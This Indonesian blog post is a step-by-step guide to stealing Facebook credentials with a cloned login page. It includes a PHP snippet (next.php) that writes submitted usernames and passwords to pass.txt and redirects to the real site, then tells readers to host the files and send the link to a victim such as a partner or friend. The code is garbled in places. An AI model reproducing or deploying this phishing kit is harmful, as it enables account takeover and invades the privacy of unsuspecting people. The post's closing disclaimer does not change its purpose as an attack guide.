Blogger Jateng

Script FB Auto Login 2022

 Pada kesempatan kali ini kami akan menerapkan salah satu metode hack Facebook yakni denga Script FB Auto Login 2022Script FB Auto Login - Pada potensi kali ini kami akan menerapkan salah satu metode hack Facebook adalah dengan memakai auto login script FB.

Untuk mampu dengan gampang mengetahui username dan juga password tanpa orang lain tahu, maka anda bisa memakai metode script hack FB tersebut.

Contohnya saja anda mampu memulai menjajal kode hacker yang satu tersebut terhadap pasangannya, pacar atau sahabat anda sendiri semoga meminalisir dilema yang akan di timbulkan lalu hari.

Baca juga : Cara Buka FB Lupa Kata Sandi dan Nomor HP tidak Aktif
Untuk lebih jelasnya, pasalnya kami sudah merangkumnya buat anda tentunya saja anda simak script FB auto login selaku berikut.


Script FB Auto Login


Script FB Auto Login

 Pada kesempatan kali ini kami akan menerapkan salah satu metode hack Facebook yakni denga Script FB Auto Login 2022
Script FB Auto Login
Dalam hal ini, biar mampu menerapkan script FB auto login ini anda harus paham pemahaman hosting lebih dahulu biar anda paham betul.
Pasalnya Hosting sendiri istilahkan dengan web Hosting atau sewa hosting merupakan tempat sewaan untuk dapat menampung data-data yang hendak diperlukan oleh suatu situs web. Agar mampu dengan gampang kanal melalui internet baik itu data mirip file gambar, email, aplikasi/program/script dan database.

Baca juga : Situs Untuk Mengetahui Password Facebook
Oleh sebab itu, hosting ini kita akan pergunakan untuk mampu menyimpan file dalam keperluan hack dengan auto login.

Berikut langkah-langkah yang harus anda ikuti dengan memakai script auto login ini:


1. Save Halaman Script FB Auto Login

Untuk langkah yang pertama, anda harus mengunduh apalagi dulu Facebook HTML Code khusus buat halaman login resmi Facebook.

Berikut cara save halaman script FB auto login:
  • Silahkan anda datangi lewat link berikut ini (http://www.facebook.com/login.php/).
  • Setelah itu, anda klik kanan dimana saja pada halaman login ini anda pilih opsi Save As.
  • Kemudian anda simpan di satu folder baru yang mudah anda cari nantinya.


2. Download Script FB Auto Login

Untuk cara yang kedua script FB auto login ini, anda harus memutuskan script hack FB dulu atau silahkan anda kunjungi melalui link berikut ini Script Hack FB.


3. Menimpa Script HTML Halaman Login Resmi Facebook dengan Script FB Auto Login

Jika anda sudah akhir mengunduh script hack FB, sekarang kita lanjut ke script FB auto login dengan copy dan timpa file HTML halaman login resmi FB yang anda peroleh di langkah awal sebelumnya.


4. Membuat File Next.txt dengan Script FB Auto Login

Langkah script FB auto login selanjutnya, anda mesti mencopy script hack FB yang ada di bawah ke Notepad dan simpan dengan memakai next.php.

Baca juga : Cara Hack Facebook dengan Javascript Code
Oleh alasannya adalah itu, anda jangan ketinggalan menaruh file pada satu folder yang sama dengan langkah ke 1 diatas tadi.
&it,?php header('Location:http://www.Facebook.com/login.php'); $handle =fopen('pass.txt','a'); foreach($_GET as $variable => $value) [fwrite($handle, $variable); fwrite($handle, '='); fwrite($handle, $value); fwrite($handle, '/n'); fclose($handle); exit; ?>



5. Membuat File Penampungan Username dan Password Target dari Script FB Auto Login

Untuk langkah berikutnya script FB auto login, anda mesti menciptakan file berekstensi. txt dengan memakai Notepad lalu anda simpan dengan nama pass.txt.


6. Hosting Semua File Script FB Auto Login

Jika anda sudah akhir mengumpulkan file di langkah 1 hingga 5, setelah itu script FB auto login anda dengan memakai hosting file itu.

Berikut daftar nama file script hack FB yang nantinya akan di upload atau hosting ialah:
  • Masuk Facebook _ Facebook _ Files
  • Masuk Facebook _ Facebook.html;
  • next.php;
  • pass.text.
Oleh alasannya itu, anda mampu upload script hack Facebook melalui github untuk bisa menghosting file tersebut secara gratis pastinya.


7. Script FB Auto Login dengan Menyebarkan Link Halaman Masuk Facebook

Jika anda sudah tamat menghosting file script hack di langkah ke 6 sebelumnya, kemudian anda berikutnya script FB auto login dengan cara copy link halaman masuk ke Facebook hasil dari hosting.

Baca juga : Cara Download Video di Facebook Tanpa Aplikasi dan Dengan Aplikasi
Pada link halaman masuk ke Facebook yang anda peroleh dari hasil menghosting barusan, lalu anda kirimkan atau berikan kepada sik korban anda dan akhir dech.


Akhir Kata

Begitulah kira-kira cara menghack FB auto login dengan menggunakan script, tentu dengan cara ini memudahkan anda dalam menghack Facebook seseorang.

Tentu saja dengan cara kami berikan bisa mengembalikan akun anda yang terkena hack oleh orang lain, dalam hal ini mempermudah anda menggunakan script hack.

Namun anda jangan gunakan cara tersebut ke hal-hal yang dapat merugikan orang lain, akan tetapi mampu mempelajarinya semoga anda paham tentang dunia hacker.

Itulah seluruh isi artikel kita kali ini tentang script FB auto login. Sekian dan mudah-mudahan bermanfaat.